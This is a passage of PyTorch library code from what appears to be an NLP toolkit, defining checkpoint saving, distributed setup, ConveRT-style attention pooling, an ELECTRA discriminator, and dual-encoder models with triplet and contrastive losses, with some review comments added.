    # Unwrap DistributedDataParallel/DataParallel so the raw weights are saved
    model_ = model.module if hasattr(model, 'module') else model
    torch.save(model_.state_dict(), checkpoint_name+'.pth')
    if save_npz:
        # Deferred import: only needed (and only has to be importable) when npz export is requested
        from eight_mile.pytorch.serialize import save_tlm_npz, save_tlm_output_npz, save_transformer_seq2seq_npz, save_transformer_de_npz
        # Dispatch on model structure: seq2seq, dual encoder, LM with output head, plain LM
        if hasattr(model_, 'decoder'):
            save_transformer_seq2seq_npz(model_, checkpoint_name+'.npz')
        elif hasattr(model_, 'reduction_layer'):
            save_transformer_de_npz(model_, checkpoint_name+'.npz')
        elif hasattr(model_, 'output_layer'):
            save_tlm_output_npz(model_, checkpoint_name+'.npz')
        else:
            save_tlm_npz(model_, checkpoint_name+'.npz')
    # Only prune old checkpoints on epoch boundaries
    if tick_type == 'epoch':
        rm_old_checkpoints(model_base, count)
def init_distributed(local_rank):
    """Initialize `torch.distributed` (NCCL backend) and pick this process's CUDA device.

    :param local_rank: This process's rank on the node; pass -1 to read it from
        the `RANK` environment variable (as set by e.g. kubeflow)
    :return: A `(device, local_rank)` tuple
    """
    if local_rank == -1:
        # https://github.com/kubeflow/pytorch-operator/issues/128
        # https://github.com/pytorch/examples/blob/master/imagenet/main.py
        logger.info("Setting local rank to RANK env variable")
        local_rank = int(os.environ['RANK'])
    logger.warning("Local rank (%d)", local_rank)
    # In an env like k8s with kubeflow each worker will only see a single gpu
    # with an id of 0. If the gpu count is 1 then we are probably in an env like
    # that so we should just use the first (and only) gpu avaiable
    if torch.cuda.device_count() == 1:
        torch.cuda.set_device(0)
        device = torch.device("cuda", 0)
    # This program assumes multiprocess/multi-device on a single node. Each
    # process gets a rank (via cli or ENV variable) and uses that rank to select
    # which gpu to use. This only makes sense on a single node, if you had 4
    # processes on 2 nodes where each node has 2 GPUs then the ranks would be
    # 0, 1, 2, 3 but the gpus numbers would be node 0: 0, 1 and node 1: 0, 1
    # and this assignment to gpu 3 would fail. On a single node with 4 processes
    # and 4 gpus the rank and gpu ids will align and this will work
    else:
        torch.cuda.set_device(local_rank)
        device = torch.device("cuda", local_rank)
    # Rendezvous via MASTER_ADDR/MASTER_PORT environment variables
    torch.distributed.init_process_group(backend='nccl', init_method='env://')
    return device, local_rank
class AttentionReduction(nn.Module):
    """
    This is a reduction that is given Q, K, V and a mask vector.  Different from base reductions, which get an embedding stack
    """

    def __init__(self):
        super().__init__()

    def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Inputs are the same as for a normal attention function, but the output here is a single tensor, ``[B, H]``

        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param value: a set of values from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: sentence-level encoding with dim [B, d_model]
        """
        # Abstract: subclasses (e.g. SingleHeadReduction, TwoHeadConcat) implement the reduction
class SingleHeadReduction(AttentionReduction):
    """
    Implementation of the "self_attention_head" layer from the conveRT paper (https://arxiv.org/pdf/1911.03688.pdf)
    """

    def __init__(
        self, d_model: int, dropout: float = 0.0, scale: bool = False, d_k: Optional[int] = None, pooling: str = 'sqrt_length',
    ):
        """
        :param d_model: The model hidden size
        :param dropout (``float``): The amount of dropout to use
        :param scale: should we scale the dot product attention
        :param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
        :param pooling: how to pool over time: 'sqrt_length' (sum scaled by sqrt(len)), 'mean', or 'max'
        """
        super().__init__()
        self.output_dim = d_model
        if d_k is None:
            self.d_k = d_model
        else:
            self.d_k = d_k
        # Single-head projections for query and key only; values pass through unprojected
        self.w_Q = Dense(d_model, self.d_k)
        self.w_K = Dense(d_model, self.d_k)
        if scale:
            self.attn_fn = SeqScaledDotProductAttention(dropout)
        else:
            self.attn_fn = SeqDotProductAttention(dropout)
        self.attn = None  # last attention weights, kept for inspection/visualization
        pooling = pooling.lower()
        # Value written into masked timesteps before pooling; -1e9 so max-pool ignores them,
        # 0 so sum/mean pooling ignores them
        self.fill = 0
        if pooling == 'max':
            self.pool = self._max_pool
            self.fill = -1e9
        elif pooling == 'mean':
            self.pool = self._mean_pool
        else:
            self.pool = self._sqrt_length_pool

    def _sqrt_length_pool(self, x, seq_lengths):
        # Sum over time, scaled by sqrt(sequence length), per the conveRT paper
        x = x.sum(dim=1)  # [B, D]
        x = x * seq_lengths.float().sqrt().unsqueeze(-1)
        return x

    def _mean_pool(self, x, seq_lengths):
        # Mean over valid timesteps (masked positions were filled with 0)
        return torch.sum(x, 1, keepdim=False) / torch.unsqueeze(seq_lengths, -1).to(x.dtype).to(
            x.device
        )

    def _max_pool(self, x, _):
        # Max over time (masked positions were filled with -1e9 so they never win)
        x, _ = torch.max(x, 1, keepdim=False)
        return x

    def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """According to conveRT model's graph, they project token encodings to lower-dimensional query and key in single
        head, use them to calculate the attention score matrix that has dim [B, T, T], then sum over the query dim to
        get a tensor with [B, 1, T] (meaning the amount of attentions each token gets from all other tokens), scale it
        by sqrt of sequence lengths, then use it as the weight to weighted sum the token encoding to get the sentence
        encoding. we implement it in an equivalent way that can best make use of the eight_mile codes: do the matrix
        multiply with value first, then sum over the query dimension.

        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param value: a set of values from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: sentence-level encoding with dim [B, d_model]
        """
        query, key, value, mask = qkvm
        batchsz = query.size(0)
        seq_mask = mask.squeeze(1).squeeze(1)  # [B, T]
        seq_lengths = seq_mask.sum(dim=1)

        # (B, H, T, D), still have num_heads = 1 to use the attention function defined in eight_miles
        query = self.w_Q(query).view(batchsz, -1, 1, self.d_k).transpose(1, 2)
        key = self.w_K(key).view(batchsz, -1, 1, self.d_k).transpose(1, 2)
        value = value.view(batchsz, -1, 1, self.output_dim).transpose(1, 2)
        x = self.attn_fn((query, key, value, mask))  # [B, 1, T, D]
        self.attn = self.attn_fn.attn

        x = x.squeeze(1)  # [B, T, D]
        # Blank out padded positions (with self.fill) so they do not affect pooling
        x = x.masked_fill(seq_mask.unsqueeze(-1) == MASK_FALSE, self.fill)
        return self.pool(x, seq_lengths)
class TransformerDiscriminator(nn.Module):
    """A Transformer model that tries to predict if each token is real or fake

    This model is based on [ELECTRA: Pre-Training Text Encoders as Discriminators Rather Than Generators,
    Clark et al. 2019](https://openreview.net/pdf?id=r1xMH1BtvB).
    """

    def __init__(
        self,
        embeddings,
        num_heads: int,
        d_model: int,
        dropout: bool,
        layers: int = 1,
        activation: str = "relu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[Union[int, List[int]]] = None,
        layer_norms_after: bool = False,
        layer_norm_eps: float = 1.0e-6,
        embeddings_reduction: str = 'sum',
        **kwargs,
    ):
        """
        :param embeddings: input embeddings, stacked into an `EmbeddingsStack`
        :param num_heads: number of attention heads
        :param d_model: transformer hidden size; must equal the embedding output dim (asserted)
        :param dropout: dropout rate
        :param layers: number of transformer encoder layers
        :param activation: FFN activation function
        :param d_ff: FFN inner size
        :param d_k: optional per-head dim override
        :param rpr_k: relative position representation window size(s)
        :param layer_norms_after: use post-LN instead of pre-LN
        :param layer_norm_eps: epsilon for layer norm
        :param embeddings_reduction: how multiple embeddings are combined
        :param kwargs: supports `weight_std` (init std, default 0.02) and
            `lengths_feature` (feature key used to build the pad mask)
        """
        super().__init__()
        self.embeddings = EmbeddingsStack(embeddings, dropout, reduction=embeddings_reduction)
        self.weight_std = kwargs.get('weight_std', 0.02)
        assert self.embeddings.dsz == d_model
        self.transformer = TransformerEncoderStack(
            num_heads, d_model=d_model, pdrop=dropout, scale=True,
            layers=layers, activation=activation, d_ff=d_ff, rpr_k=rpr_k, d_k=d_k,
            layer_norms_after=layer_norms_after, layer_norm_eps=layer_norm_eps
        )
        # Per-timestep binary (real vs fake) head
        self.proj_to_output = pytorch_linear(d_model, 1)

        self.apply(self.init_layer_weights)
        # Defaults to the first embedding's feature key if not given
        self.lengths_feature = kwargs.get('lengths_feature', list(self.embeddings.keys())[0])

    def init_layer_weights(self, module):
        # Normal init for linear/embedding/LN weights; zero out biases
        if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
            module.weight.data.normal_(mean=0.0, std=self.weight_std)
        if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
            module.bias.data.zero_()

    def forward(self, features):
        """Produce a per-token probability that the token is real.

        :param features: dict of feature tensors; `self.lengths_feature` is used for the pad mask
        :return: sigmoid scores with a trailing singleton channel dim
        """
        embedded = self.embeddings(features)
        x = features[self.lengths_feature]
        # [B, 1, 1, T] attention mask: 1 wherever the token is not PAD
        input_mask = torch.zeros(x.shape, device=x.device, dtype=torch.long).masked_fill(x != Offsets.PAD, 1).unsqueeze(1).unsqueeze(1)
        transformer_out = self.transformer((embedded, input_mask))
        binary = self.proj_to_output(transformer_out)
        return torch.sigmoid(binary)

    def create_loss(self):
        # Per-element BCE; reduction is left to the trainer
        return nn.BCELoss(reduction="none")
class PooledSequenceCriterion(nn.Module):
    """BCE-style criterion against a multi-hot bag-of-vocab built from the target sequence.

    Targets [B, T] are one-hot encoded and collapsed over time into a multi-hot
    [B, C] vector (PAD/EOS/GO cleared); the loss compares this against the
    inputs, max-pooling the inputs over their leading axis when they still
    carry a time dimension.
    """

    def __init__(self, LossFn=nn.BCEWithLogitsLoss, avg='token'):
        """
        :param LossFn: the underlying loss constructor (expects logits by default)
        :param avg: 'token' uses the loss as-is; anything else divides by batch size
        """
        super().__init__()
        if avg == 'token':
            self.crit = LossFn()
            self._norm = self._no_norm
        else:
            self.crit = LossFn()
            self._norm = self._batch_norm

    def _batch_norm(self, loss, inputs):
        # Normalize by batch size
        return loss / inputs.size()[0]

    def _no_norm(self, loss, inputs):
        return loss

    def forward(self, inputs, targets):
        """Evaluate some loss over a sequence.

        :param inputs: torch.FloatTensor, [B, C] The scores from the model. Batch First
        :param targets: torch.LongTensor, The labels.
        :returns: torch.FloatTensor, The loss.
        """
        #inputs = inputs.transpose(0, 1)
        C = inputs.shape[-1]
        flat_targets = torch.nn.functional.one_hot(targets, C)

        # Get the offsets of the non-zero targets, the values of these are all on
        flat_targets = (torch.sum(flat_targets, axis=1) != 0).float()
        # Special tokens never count as positive labels
        flat_targets[:, Offsets.PAD] = 0
        flat_targets[:, Offsets.EOS] = 0
        flat_targets[:, Offsets.GO] = 0

        if len(inputs.shape) > 2:
            # Inputs still have a leading time axis: take the per-vocab max over it
            # NOTE(review): assumes time-first layout here ([T, B, C]) — confirm against callers
            max_per_vocab = inputs.max(0)[0]
            loss = self.crit(max_per_vocab, flat_targets)
        else:
            loss = self.crit(inputs, flat_targets)
        return self._norm(loss, inputs)
class SequenceCriterion(nn.Module):
    """Token-level loss over a [B, T] label sequence, ignoring PAD positions.

    :param LossFn: loss constructor; must accept `ignore_index` and `reduction`
    :param avg: 'token' averages over (non-pad) tokens; anything else sums the
        loss and normalizes by batch size
    """

    def __init__(self, LossFn=nn.NLLLoss, avg='token'):
        super().__init__()
        if avg == 'token':
            # FIX: `size_average=True` is deprecated in PyTorch; `reduction='mean'`
            # is the documented equivalent
            self.crit = LossFn(ignore_index=Offsets.PAD, reduction='mean')
            self._norm = self._no_norm
        else:
            # FIX: `size_average=False` -> `reduction='sum'`
            self.crit = LossFn(ignore_index=Offsets.PAD, reduction='sum')
            self._norm = self._batch_norm

    def _batch_norm(self, loss, inputs):
        # Normalize a summed loss by the batch size
        return loss / inputs.size()[0]

    def _no_norm(self, loss, inputs):
        return loss

    def forward(self, inputs, targets):
        """Evaluate some loss over a sequence.

        :param inputs: torch.FloatTensor, [B, .., C] The scores from the model. Batch First
        :param targets: torch.LongTensor, The labels.
        :returns: torch.FloatTensor, The loss.
        """
        # Flatten batch and time so the criterion sees [B*T, C] vs [B*T]
        total_sz = targets.nelement()
        loss = self.crit(inputs.view(total_sz, -1), targets.view(total_sz))
        return self._norm(loss, inputs)
def pytorch_conv1d(in_channels, out_channels, fsz, unif=0, padding=0, initializer=None, stride=1, bias=True, groups=1):
    """Create an `nn.Conv1d` with the requested weight initialization.

    :param in_channels: number of input channels
    :param out_channels: number of output channels (filters)
    :param fsz: filter (kernel) size
    :param unif: if > 0, initialize weights uniformly in [-unif, unif] and leave
        the bias with its default init; otherwise the `initializer` scheme is used
    :param padding: conv padding
    :param initializer: None (Xavier uniform), 'ortho', 'he'/'kaiming', or 'normal'
    :param stride: conv stride
    :param bias: include a bias term (zeroed for all non-`unif` initializers)
    :param groups: conv groups
    :return: the initialized `nn.Conv1d`
    """
    c = nn.Conv1d(in_channels, out_channels, fsz, padding=padding, stride=stride, bias=bias, groups=groups)
    if unif > 0:
        c.weight.data.uniform_(-unif, unif)
    else:
        if initializer == "ortho":
            nn.init.orthogonal_(c.weight)
        elif initializer == "he" or initializer == "kaiming":
            nn.init.kaiming_uniform_(c.weight)
        elif initializer == "normal":
            # FIX: was `nn.init.normal(mean=0, std=unif)` — missing the tensor
            # argument (a TypeError at runtime) and using the deprecated
            # non-inplace name; `nn.init.normal_` is the supported API
            nn.init.normal_(c.weight, mean=0, std=unif)
        else:
            nn.init.xavier_uniform_(c.weight)
        # Bias is zeroed under every named initializer (matches original per-branch zeroing)
        if bias:
            nn.init.constant_(c.bias, 0)
    return c
def tie_weight(to_layer, from_layer):
    """Tie two layers together by sharing a single weight Parameter.

    This method exists to duplicate baseline functionality across packages.

    :param to_layer: the pytorch layer to assign weights to
    :param from_layer: pytorch layer to retrieve weights from
    """
    to_layer.weight = from_layer.weight
class BilinearAttention(nn.Module):
    """Biaffine scoring layer: s = x^T W y with optional constant-1 bias features.

    Appending a 1 to `x` and/or `y` (controlled by `bias_x`/`bias_y`) turns the
    plain bilinear form into a biaffine one, as used in biaffine dependency parsing.
    """

    def __init__(self, in_hsz: int, out_hsz: int = 1, bias_x: bool = True, bias_y: bool = True):
        """
        :param in_hsz: hidden size of both `x` and `y`
        :param out_hsz: number of output scoring channels (`n_out`)
        :param bias_x: append a constant-1 feature to `x`
        :param bias_y: append a constant-1 feature to `y`
        """
        super().__init__()
        self.in_hsz = in_hsz
        self.out_hsz = out_hsz
        self.bias_x = bias_x
        self.bias_y = bias_y
        # FIX: a1/a2 were computed but never used; the Parameter shape silently
        # relied on implicit bool->int coercion (`in_hsz + bias_x`). Use the
        # explicitly-computed augmented dims instead.
        a1 = in_hsz
        a2 = in_hsz
        if self.bias_x:
            a1 += 1
        if self.bias_y:
            a2 += 1
        self.weight = nn.Parameter(torch.Tensor(out_hsz, a1, a2))
        self.reset_parameters()

    def reset_parameters(self):
        # Zero init: all scores start equal; only the mask differentiates positions
        nn.init.zeros_(self.weight)

    def forward(self, x, y, mask):
        r"""
        Args:
            x: ``[B, T, H]``.
            y: ``[B, T, H]``.
            mask: padding mask over the second sequence axis.
        Returns:
            ~torch.Tensor:
                A scoring tensor of shape ``[batch_size, n_out, seq_len, seq_len]``.
                If ``n_out=1``, the dimension for ``n_out`` will be squeezed automatically.
        """
        if self.bias_x is True:
            ones = torch.ones(x.shape[:-1] + (1,), device=x.device)
            x = torch.cat([x, ones], -1)
        if self.bias_y is True:
            # NOTE(review): the ones tensor is shaped from x — assumes x and y share [B, T]; confirm
            ones = torch.ones(x.shape[:-1] + (1,), device=y.device)
            y = torch.cat([y, ones], -1)
        # [B, 1, T, A1] @ [O, A1, A2] -> [B, O, T, A2], then @ y^T -> [B, O, T, T]
        x = x.unsqueeze(1)
        y = y.unsqueeze(1)
        u = x @ self.weight
        s = u @ y.transpose(-2, -1)
        if self.out_hsz == 1:
            s = s.squeeze(1)
        # Mask out padded positions with a large negative score
        s = s.masked_fill((mask.bool() == MASK_FALSE).unsqueeze(1), -1e9)
        return s
class TripletLoss(nn.Module):
    """Provide a Triplet Loss using the reversed batch for negatives"""

    def __init__(self, model):
        """
        :param model: dual encoder exposing `encode_query` and `encode_response`
        """
        super().__init__()
        self.score = nn.CosineSimilarity(dim=1)
        self.model = model

    def forward(self, inputs, targets):
        # Flip the batch so each query is paired with some other example's response as a negative
        negatives = targets.flip(0)
        encoded_query = self.model.encode_query(inputs)
        encoded_pos = self.model.encode_response(targets)
        encoded_neg = self.model.encode_response(negatives)
        similarity_pos = self.score(encoded_query, encoded_pos)
        similarity_neg = self.score(encoded_query, encoded_neg)
        # Hinge at zero: only penalize when the negative outscores the positive
        margin = similarity_neg - similarity_pos
        return margin.masked_fill(margin < 0.0, 0.0).sum(0)
class ContrastiveLoss(nn.Module):
    """In-batch softmax (InfoNCE-style) contrastive loss with a learnable temperature."""

    def __init__(self, model, t=1.0, train_temperature=True):
        """
        :param model: dual encoder exposing `encode_query` and `encode_response`
        :param t: initial (log-space) temperature; None falls back to 1.0
        :param train_temperature: whether the temperature is a trainable parameter
        """
        super().__init__()
        self.model = model
        temperature = 1.0 if t is None else t
        self.t = nn.Parameter(torch.tensor(temperature).float(), requires_grad=train_temperature)

    def forward(self, inputs, targets):
        # Encode and L2-normalize both sides so the dot product is cosine similarity
        query = F.normalize(self.model.encode_query(inputs), p=2, dim=1)          # [B, H]
        response = F.normalize(self.model.encode_response(targets), p=2, dim=1)   # [B, H]
        # The i-th query matches the i-th response, so the gold class is the diagonal
        gold = torch.arange(query.shape[0], device=query.device)
        scores = (query @ response.T) * self.t.exp()
        return F.cross_entropy(scores, gold)
class SymmetricContrastiveLoss(nn.Module):
    """Contrastive loss applied in both directions (query->response and response->query)."""

    def __init__(self, model, t=1.0, train_temperature=True):
        """
        :param model: dual encoder exposing `encode_query` and `encode_response`
        :param t: initial (log-space) temperature; None falls back to 1.0
        :param train_temperature: whether the temperature is a trainable parameter
        """
        super().__init__()
        self.model = model
        temperature = 1.0 if t is None else t
        self.t = nn.Parameter(torch.tensor(temperature).float(), requires_grad=train_temperature)

    def forward(self, inputs, targets):
        # L2-normalized encodings make the matmul a cosine-similarity matrix
        query = F.normalize(self.model.encode_query(inputs), p=2, dim=1)          # [B, H]
        response = F.normalize(self.model.encode_response(targets), p=2, dim=1)   # [B, H]
        gold = torch.arange(query.shape[0], device=query.device)
        scores = (query @ response.T) * self.t.exp()
        # Average the two directional losses: rows score query->response, columns the reverse
        forward_loss = F.cross_entropy(scores, gold)
        backward_loss = F.cross_entropy(scores.T, gold)
        return (forward_loss + backward_loss) * 0.5
class AllLoss(nn.Module):
    def __init__(self, model, warmup_steps=10000, reduction_type='sum'):
        r"""Loss from here https://arxiv.org/pdf/1705.00652.pdf see section 4

        We want to minimize the negative log prob of y given x

        -log P(y|x)

        P(y|x) P(x) = P(x, y)                             Chain Rule of Probability
        P(y|x) = P(x, y) / P(x)                           Algebra
        P(y|x) = P(x, y) / \sum_\hat(y) P(x, y = \hat(y)) Marginalize over all possible ys to get the probability of x
        P_approx(y|x) = P(x, y) / \sum_i^k P(x, y_k)      Approximate the Marginalization by just using the ys in the batch

        S(x, y) is the score (cosine similarity between x and y in this case) from our neural network
        P(x, y) = e^S(x, y)

        P(y|x) = e^S(x, y) / \sum_i^k e^S(x, y_k)
        log P(y|x) = log( e^S(x, y) / \sum_i^k e^S(x, y_k))
        log P(y|x) = S(x, y) - log \sum_i^k e^S(x, y_k)
        -log P(y|x) = -(S(x, y) - log \sum_i^k e^S(x, y_k))

        :param model: dual encoder exposing `encode_query`/`encode_response` and an `embeddings` stack
        :param warmup_steps: steps over which the cosine score scale anneals from 1 up to sqrt(embedding dim)
        :param reduction_type: 'mean' or 'sum' reduction over the batch
        """
        super().__init__()
        self.score = nn.CosineSimilarity(dim=-1)
        self.model = model
        # Maximum annealed scale applied to the cosine scores
        self.max_scale = math.sqrt(self.model.embeddings.output_dim)
        self.steps = 0
        self.warmup_steps = warmup_steps
        self.reduction = torch.mean if reduction_type == 'mean' else torch.sum

    def forward(self, inputs, targets):
        # This is the cosine distance annealing referred to in https://arxiv.org/pdf/1911.03688.pdf
        fract = min(self.steps / self.warmup_steps, 1)
        c = (self.max_scale-1) * fract + 1
        self.steps += 1
        # These will get broadcast to [B, B, H]
        query = self.model.encode_query(inputs).unsqueeze(1)  # [B, 1, H]
        response = self.model.encode_response(targets).unsqueeze(0)  # [1, B, H]
        # all_scores is now a batch x batch matrix where index (i, j) is the score between
        # the i^th x vector and the j^th y vector
        all_score = c * self.score(query, response)  # [B, B]
        # The diagonal has the scores of correct pair, (i, i)
        pos_score = torch.diag(all_score)
        # vec_log_sum_exp will calculate the batched log_sum_exp in a numerically stable way
        # the result is a [B, 1] vector which we squeeze to make it [B] to match the diag
        # Because we are minimizing the negative log we turned the division into a subtraction here
        loss = pos_score - vec_log_sum_exp(all_score, -1).squeeze()
        # Batch loss
        loss = self.reduction(loss)
        # minimize the negative loss
        return -loss
class CosineSimilarityLoss(nn.Module):
    """MSE between pairwise cosine similarity and per-label target values.

    The input is two encodings concatenated on the last axis; label 0 maps to
    `neg_value` and label 1 to `pos_value` as the target similarity.
    """

    def __init__(self, neg_value=0.3, pos_value=0.8):
        """
        :param neg_value: target cosine similarity for negative (label 0) pairs
        :param pos_value: target cosine similarity for positive (label 1) pairs
        """
        super().__init__()
        self.pos_value = pos_value
        self.neg_value = neg_value

    def forward(self, embeddings_reduction, labels):
        # Split the concatenated [B, 2H] encodings back into two [B, H] halves
        half = int(embeddings_reduction.shape[-1]//2)
        first = embeddings_reduction[:, :half]
        second = embeddings_reduction[:, half:]
        # Map labels {0, 1} onto the configured target similarities
        target = torch.zeros_like(labels, dtype=torch.float)
        target[labels == 0] = self.neg_value
        target[labels == 1] = self.pos_value
        similarity = torch.cosine_similarity(first, second)
        return F.mse_loss(similarity, target.view(-1), reduction='mean')
class OnlineContrastiveLoss(nn.Module):
    """Contrastive loss over only the hardest pairs in the batch.

    The input is two encodings concatenated on the last axis. "Hard" positives
    (further apart than the closest negative) are pulled together; "hard"
    negatives (closer than the furthest positive) are pushed past a 0.5 margin.
    """

    def __init__(self):
        super().__init__()

    def forward(self, embeddings_reduction, labels):
        # Split the concatenated [B, 2H] encodings into the two [B, H] sides
        half = int(embeddings_reduction.shape[-1]//2)
        left = embeddings_reduction[:, :half]
        right = embeddings_reduction[:, half:]
        # Cosine distance (1 - similarity)
        distances = 1 - F.cosine_similarity(left, right)
        neg_distances = distances[labels == 0]
        pos_distances = distances[labels == 1]
        # select hard positive and hard negative pairs
        neg_cutoff = pos_distances.max() if len(pos_distances) > 1 else neg_distances.mean()
        pos_cutoff = neg_distances.min() if len(neg_distances) > 1 else pos_distances.mean()
        hard_negatives = neg_distances[neg_distances < neg_cutoff]
        hard_positives = pos_distances[pos_distances > pos_cutoff]
        positive_loss = hard_positives.pow(2).sum()
        negative_loss = F.relu(0.5 - hard_negatives).pow(2).sum()
        return positive_loss + negative_loss
class TwoHeadConcat(AttentionReduction):
    """Use two parallel SingleHeadReduction, and concatenate the outputs. It is used in the conveRT
    paper (https://arxiv.org/pdf/1911.03688.pdf)"""

    def __init__(self, d_model, dropout, scale=False, d_k=None, pooling='sqrt_length'):
        """Two parallel 1-head self-attention, then concatenate the output

        :param d_model: dim of the self-attention
        :param dropout: dropout of the self-attention
        :param scale: scale for the self-attention
        :param d_k: d_k of the self-attention
        :param pooling: pooling strategy passed to each head
        :return: concatenation of the two 1-head attention
        """
        super().__init__()
        # Each head emits d_model, so the concatenated output is twice that
        self.output_dim = 2*d_model
        self.reduction1 = SingleHeadReduction(d_model, dropout, scale=scale, d_k=d_k, pooling=pooling)
        self.reduction2 = SingleHeadReduction(d_model, dropout, scale=scale, d_k=d_k, pooling=pooling)

    def forward(self, inputs: torch.Tensor):
        # Run the two independent single-head reductions over the same (q, k, v, mask) input
        head1 = self.reduction1(inputs)
        head2 = self.reduction2(inputs)
        return torch.cat([head1, head2], dim=-1)
class ConveRTFFN(nn.Module):
    """Implementation of the FFN layer from the convert paper (https://arxiv.org/pdf/1911.03688.pdf)"""

    def __init__(self, insz, hszs, outsz, pdrop):
        """
        :param insz: input dim
        :param hszs: list of hidden sizes
        :param outsz: output dim
        :param pdrop: dropout of each hidden layer
        """
        super().__init__()
        self.dense_stack = DenseStack(
            insz,
            hszs,
            activation='gelu',
            pdrop_value=pdrop,
            skip_connect=True,
            layer_norm=True,
        )
        self.final = Dense(hszs[-1], outsz)
        # Project the residual path only when input and output dims differ
        self.proj = nn.Identity() if insz == outsz else Dense(insz, outsz)
        self.ln1 = nn.LayerNorm(insz, eps=1e-6)
        self.ln2 = nn.LayerNorm(outsz, eps=1e-6)

    def forward(self, inputs):
        # Pre-norm -> dense stack -> final projection, plus a residual from the raw input
        hidden = self.dense_stack(self.ln1(inputs))
        hidden = self.final(hidden)
        return self.ln2(hidden + self.proj(inputs))
class DualEncoderModel(nn.Module):
    """Abstract base for dual encoders

    We can assume that our dual encoder needs to end up in the same output plane between the encoders, and we can define
    the set of losses here that we are likely to need for most.
    """

    def __init__(self, in_sz: int, stacking_layers: Union[int, List[int]] = None, d_out: int = 512,
                 ffn_pdrop=0.1, in_sz_2=None, output_layer=False, output_activation='tanh', output_shared=False):
        """
        :param in_sz: output dim of the first (query-side) encoder
        :param stacking_layers: hidden sizes for optional ConveRT-style FFN stacks on top of each encoder
        :param d_out: dim of the shared output plane
        :param ffn_pdrop: dropout used inside the FFN stacks
        :param in_sz_2: output dim of the second (response-side) encoder; falls back to `in_sz`
        :param output_layer: force a Dense projection (with activation) even when sizes already match
        :param output_activation: activation for that projection when `output_layer` is True
        :param output_shared: share one projection between both sides (only when input sizes match)
        """
        super().__init__()
        if not in_sz_2:
            in_sz_2 = in_sz
        if stacking_layers:
            stacking_layers = listify(stacking_layers)
        if stacking_layers:
            # ConveRT-style FFN towers on each side, both landing in d_out
            self.ff1 = ConveRTFFN(in_sz, stacking_layers, d_out, ffn_pdrop)
            self.ff2 = ConveRTFFN(in_sz_2, stacking_layers, d_out, ffn_pdrop)
        elif output_layer or in_sz != d_out or in_sz != in_sz_2:
            # A single Dense projection per side; activation only when explicitly requested
            activation = output_activation if output_layer else None
            self.ff1 = Dense(in_sz, d_out, activation=activation)
            if in_sz == in_sz_2 and output_shared:
                self.ff2 = self.ff1
            else:
                self.ff2 = Dense(in_sz_2, d_out, activation=activation)
        else:
            # Dims already line up on both sides; no projection needed
            self.ff1 = nn.Identity()
            self.ff2 = nn.Identity()
        self.output_dim = d_out

    def encode_query_base(self, query: torch.Tensor) -> torch.Tensor:
        # Abstract: subclasses produce the raw query encoding
        pass

    def encode_response_base(self, response: torch.Tensor) -> torch.Tensor:
        # Abstract: subclasses produce the raw response encoding
        pass

    def encode_query(self, query: torch.Tensor) -> torch.Tensor:
        # Raw encoding followed by the query-side projection into the shared plane
        tensor = self.encode_query_base(query)
        return self.ff1(tensor)

    def encode_response(self, response: torch.Tensor) -> torch.Tensor:
        # Raw encoding followed by the response-side projection into the shared plane
        tensor = self.encode_response_base(response)
        return self.ff2(tensor)

    def forward(self, query, response):
        encoded_query = self.encode_query(query)
        encoded_response = self.encode_response(response)
        return encoded_query, encoded_response

    def create_loss(self, loss_type='symmetric', init_temp=None, learn_temp=False):
        """Create one of the dual-encoder losses; any unrecognized type falls back to triplet loss."""
        if loss_type == 'all':
            return AllLoss(self)
        elif loss_type == 'all_mean':
            return AllLoss(self, reduction_type='mean')
        elif loss_type == 'contrastive':
            return ContrastiveLoss(self, init_temp, learn_temp)
        elif loss_type == 'symmetric':
            return SymmetricContrastiveLoss(self, init_temp, learn_temp)
        return TripletLoss(self)
class BasicDualEncoderModel(DualEncoderModel):
    """A simple encoder where the encoders are injected and supply the `encode_query_base` and `encode_response_base`
    """

    def __init__(self, encoder_1: nn.Module, encoder_2: nn.Module, stacking_layers: Union[int, List[int]] = None, d_out: int = 512, ffn_pdrop=0.1):
        """
        :param encoder_1: query-side encoder; must expose `output_dim`
        :param encoder_2: response-side encoder; must expose `output_dim`
        :param stacking_layers: optional FFN stack sizes (see `DualEncoderModel`)
        :param d_out: shared output plane dim
        :param ffn_pdrop: dropout inside the FFN stacks
        """
        super().__init__(encoder_1.output_dim, stacking_layers, d_out, ffn_pdrop, in_sz_2=encoder_2.output_dim)
        self.encoder_1 = encoder_1
        self.encoder_2 = encoder_2

    def encode_query_base(self, query: torch.Tensor) -> torch.Tensor:
        # Delegate to the injected query-side encoder
        return self.encoder_1(query)

    def encode_response_base(self, response: torch.Tensor) -> torch.Tensor:
        # Delegate to the injected response-side encoder
        return self.encoder_2(response)
class PairedModel(DualEncoderModel):
    """Legacy model for transformer-based dual encoder

    This is a dual-encoder transformer model which shares the lower layer encoder transformer sub-graph
    The reduction layer is attention based and takes the same input as the transformer layers. It pools the reprs

    Finally, the feed-forward stacks are applied via subclassing.

    Note that this model predates the more abstract `AbstractDualEncoder` which could accomplish the same thing
    by injecting the same `nn.Module` for encoder_1 and encoder_2 consisting of the transformer and reduction
    """

    def __init__(self, embeddings,
                 d_model: int,
                 d_ff: int,
                 dropout: float,
                 num_heads: int,
                 num_layers: int,
                 stacking_layers: Optional[nn.Module] = None,
                 d_out: Optional[int] = None,
                 d_k: Optional[int] = None,
                 weight_std: float = 0.02,
                 rpr_k: Optional[int] = None,
                 reduction_d_k: int = 64,
                 ffn_pdrop: float = 0.1,
                 windowed_ra: bool = False,
                 rpr_value_on: bool = False,
                 reduction_type: str = "2ha",
                 freeze_encoders: bool = False,
                 layer_norms_after: bool = False,
                 embeddings_reduction: str = 'sum',
                 layer_norm_eps: float=1e-6,
                 output_layer: bool = False,
                 output_activation: str = 'tanh',
                 output_shared: bool = False,
                 transformer_type: Optional[str]=None,
